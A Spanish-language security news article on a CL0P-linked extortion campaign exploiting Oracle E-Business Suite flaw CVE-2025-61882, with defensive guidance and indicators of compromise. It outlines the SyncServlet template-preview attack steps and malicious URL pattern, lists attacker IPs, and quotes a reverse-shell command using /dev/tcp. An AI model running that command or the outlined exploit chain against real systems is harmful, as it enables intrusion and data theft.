Un tándem formado por Google Threat Intelligence Group (GTIG) y Mandiant ha desvelado una campaña de extorsión a gran escala que aprovecha una vulnerabilidad de día cero en Oracle E-Business Suite (EBS). El actor tras la operación —que reivindica afinidad con la marca CL0P— habría encadenado meses de intrusión silenciosa, exfiltración de datos y, desde el 29 de septiembre de 2025, una oleada de correos a directivos en múltiples sectores para forzar el pago. Oracle ha publicado parches de emergencia y urge a aplicarlos de inmediato.

Qué ha pasado y por qué importa

• Vector principal: explotación de CVE-2025-61882 (CVSS 9,8) y de cadenas de fallos en componentes de EBS expuestos a Internet.
• Cronología: indicios de actividad desde julio de 2025; explotación consistente desde agosto; extorsión a partir del 29 de septiembre.
• Objetivo: Oracle EBS, ERP crítico para finanzas, compras, RR. HH. y operaciones. Comprometer EBS reduce o evita el movimiento lateral: los datos sensibles ya residen allí.
• Modus operandi: el actor envía correos de extorsión desde cuentas de terceros comprometidas (credenciales de infostealers), mostrando listados reales de archivos de EBS robados para dar credibilidad.
• Marca CL0P: la infraestructura y los artefactos recuerdan a campañas históricas ligadas a ese ecosistema y a FIN11, aunque no hay atribución formal cerrada.

Así se entra: dos cadenas contra EBS

1) UiServlet (pre-julio / post-julio con intentos fallidos)

Peticiones a /OA_HTML/configurator/UiServlet combinan SSRF, inyección CRLF, bypass de autenticación e inyección XSL para lograr RCE. Se han visto tanto comandos en Linux (vía bash) como en Windows (vía cmd.exe). Tras los parches de julio, algunos intentos muestran timeouts en logs, señal de mitigación parcial.

2) SyncServlet (agosto en adelante, no autenticado)

Ataques a /OA_HTML/SyncServlet permiten RCE sin autenticación mediante el XDO Template Manager:

1. POST a SyncServlet.
2. Creación de una plantilla XDO maliciosa en base de datos (XDO_TEMPLATES_B / XDO_LOBS), con TEMPLATE_CODE que suele empezar por TMP o DEF y TemplateType en XSL-TEXT o XML.
3. Disparo del payload via Template Preview con una URL del tipo:
   /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG&TemplateCode=<TMP|DEF><hex>&TemplateType=<XSL-TEXT|XML>…

El payload XSL lleva Java embebido en Base64 que carga etapas adicionales en memoria.

Qué se despliega dentro: GOLDVEIN.JAVA y la familia SAGE*

• GOLDVEIN.JAVA (downloader): variante Java de GOLDVEIN que se conecta a C2 (enmascarado como falso “TLSv3.1”) para traer segunda etapa. Los resultados de ejecución pueden aparecer “camuflados” en comentarios HTML.
• Cadena SAGE*:
  • SAGEGIFT: loader reflectivo para WebLogic.
  • SAGELEAF: dropper en memoria que instala SAGEWAVE.
  • SAGEWAVE: filtro de servlet persistente que acepta un ZIP cifrado con AES con clases Java. Variantes exigen una cabecera X-ORACLE-DMS-ECID fija y filtran rutas que contienen /help/.../iHelp/ o /support/.../iHelp/.

Tras lograr RCE, se han registrado comandos de reconocimiento ejecutados como applmgr (df -h, ip addr, netstat -an, consultas a /etc/hosts, /etc/fstab, ARP, pings) y shells inversos del tipo bash -i >& /dev/tcp/<IP>/<puerto> 0>&1.

Extorsión con manual de presión

Los correos de chantaje no incluyen cifra ni canal de pago de inicio; piden contacto a buzones asociados al ecosistema CL0P y muestran pruebas (listados de ficheros) para legitimar el acceso. Siguiendo patrones anteriores, no publican víctimas al instante en su sitio de filtraciones: esperan para negociar y aumentar la presión.

Por qué este caso eleva el riesgo

• ERP como “caja fuerte”: al atacar EBS, el actor maximiza el rendimiento: datos críticos ya están en la aplicación.
• Artefactos “fileless”: cargas Java en memoria y canales de salida disimulados hacen que SIEMs y antivirus vean poco.
• Escala y repetición: CL0P/FIN11 han demostrado capacidad para repetir esta fórmula: 0-day → explotación masiva → extorsión diferida.

Señales e IOCs que deberían disparar alertas

• IPs vistas en la actividad: 200.107.207.26, 161.97.99.49.
• Posibles C2 de GOLDVEIN.JAVA: 162.55.17.215:443, 104.194.11.200:443.
• Endpoints sospechosos:
  • /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG (especial atención si TemplateCode comienza por TMP o DEF).
  • /OA_HTML/configurator/UiServlet.
  • /OA_HTML/SyncServlet.
  • Subcadenas: /help/state/content/destination./navId.1/navvSetId.iHelp/ y /support/state/content/destination./navId.1/navvSetId.iHelp/.
• Procesos: hijos de bash -i lanzados por Java bajo la cuenta applmgr.
• Respuestas HTTP con comentarios HTML “ruidosos” que podrían contener salidas de comandos.

Qué hacer ahora (y en este orden)

1) Parchar ya.
Aplique los parches de emergencia de EBS publicados en octubre y ponga la plataforma al día con los Critical Patch Updates. Cerrar CVE-2025-61882 y cadenas relacionadas corta la vía de entrada conocida.

2) Auditar plantillas XDO.
Busque creaciones recientes en XDO_TEMPLATES_B y XDO_LOBS; revise plantillas con TEMPLATE_CODE TMP* o DEF* y contenido XSL que decodifique Base64 y cargue clases Java.

3) Cerrar salidas a Internet desde servidores de EBS.
Bloquee todo egress no esencial. Estas familias necesitan C2 para segunda etapa y exfiltración. Este control compensa incluso si el host ya está comprometido.

4) Intensificar la monitorización.
WAF/IDS con reglas específicas para UiServlet/SyncServlet, para TemplatePreviewPG con TMP/DEF, y para las rutas iHelp. Aumente la retención de logs de acceso y aplique detecciones de respuestas con comentarios HTML anómalos.

5) Forense de memoria si hay sospecha.
Volcar procesos Java del middleware EBS; buscar clases cargadas reflectivamente y filtros añadidos.

6) Preparar la respuesta a extorsión.
Defina playbooks legales y de comunicación. No interactúe sin asesoría; no pague; coordine con autoridades y CSIRTs.

Claves rápidas para CIO/CISO

• Inventario de exposición: qué instancias EBS están publicadas y qué versión ejecutan.
• Segmentación y egress cero: que EBS no tenga salida libre a Internet.
• Gobernanza: políticas para plantillas y plugins de EBS; revisiones periódicas de XDO.
• Ensayos de mesa: simular un correo de extorsión y recorrer decisiones (técnicas, legales, regulatorias).

---

Preguntas frecuentes (FAQ)

¿Si ya apliqué los parches de octubre estoy a salvo?
Reduce drásticamente el riesgo de nueva explotación, pero debe comprobar si hubo intrusión previa: audite plantillas XDO, endpoints y tráfico saliente.

¿Cómo detecto una plantilla maliciosa en EBS?
Revise XDO_TEMPLATES_B y XDO_LOBS por fecha de creación y prefijos TMP/DEF. Busque XSL con Base64 y llamadas a clases Java. Si aparecen, trate el host como comprometido.

¿Bloquear el egress arregla el problema?
No sana el servidor, pero rompe la cadena (sin C2, sin segunda etapa ni exfiltración). Es crítico además del parcheado y la limpieza.

¿Debo asumir fuga de datos?
La campaña incluye exfiltración en varios casos. Si hay IOCs, active forense, evaluación de impacto, obligaciones de notificación (si aplica) y planes de comunicación con afectados.

vía: Noticias de seguridad Oracle y cloud.google.com